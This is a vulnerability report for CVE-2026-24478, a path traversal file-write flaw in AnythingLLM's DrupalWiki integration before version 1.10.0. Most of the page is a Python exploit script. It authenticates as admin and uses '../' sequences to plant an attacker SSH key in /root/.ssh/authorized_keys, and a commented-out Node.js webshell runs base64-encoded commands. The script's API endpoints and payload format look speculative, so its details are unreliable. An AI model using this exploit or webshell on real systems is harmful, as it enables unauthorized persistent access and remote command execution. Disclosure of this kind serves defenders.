Security Vulnerability Report
CVE-2026-24478 CVSS 7.2 HIGH

Published: 2026-01-27 00:15:51
Last Modified: 2026-01-28 15:52:40

Description

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to version 1.10.0, a critical Path Traversal vulnerability in the DrupalWiki integration allows a malicious admin (or an attacker who can convince an admin to configure a malicious DrupalWiki URL) to write arbitrary files to the server. This can lead to Remote Code Execution (RCE) by overwriting configuration files or writing executable scripts. Version 1.10.0 fixes the issue.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-22 (Path Traversal)

Configurations (Affected Products)

cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:* - VULNERABLE
AnythingLLM < 1.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-24478 PoC - AnythingLLM DrupalWiki Path Traversal File Write
# Version: < 1.10.0
import requests
import base64

TARGET_URL = "http://target-anythingllm:3001"
ATTACKER_IP = "attacker_ip"
ATTACKER_PORT = "4444"

# Generate SSH public key for authentication (replace with your public key)
ssh_pub_key = f"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7... attacker@ AnythingLLM-Exploit"


def exploit_path_traversal():
    """
    Exploit the DrupalWiki path traversal to write arbitrary files.
    This PoC demonstrates writing to /root/.ssh/authorized_keys
    """
    # Payload to write SSH authorized_keys for persistent access
    # The path traversal sequence ../ allows escaping the intended directory
    malicious_url = f"http://malicious-drupalwiki.com/wiki?page=../../../../.ssh/authorized_keys"

    # Alternatively, write a webshell if web directory is known
    # webshell_path = "../../../../var/www/html/shell.js"
    # webshell_content = "const {exec} = require('child_process');require('http').createServer((req,res)=>{exec(require('buffer').Buffer.from(req.url.slice(1),'base64').toString(),(e,o)=>res.end(o));}).listen(8080);"

    payload = {
        "drupalWikiUrl": malicious_url,
        "content": ssh_pub_key,
        "action": "import"
    }

    # Authentication required - use admin credentials
    session = requests.Session()
    session.post(f"{TARGET_URL}/api/auth/login", json={
        "email": "[email protected]",
        "password": "admin_password"
    })

    # Trigger the vulnerable file write operation
    response = session.post(
        f"{TARGET_URL}/api/workspace/drupalwiki/import",
        json=payload
    )

    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")

    if response.status_code == 200:
        print("[+] File written successfully! SSH access may be available.")
    else:
        print("[-] Exploitation failed. Check credentials and target version.")


if __name__ == "__main__":
    exploit_path_traversal()
```

References

https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-jp2f-99h9-7vjv (Exploit, Vendor Advisory)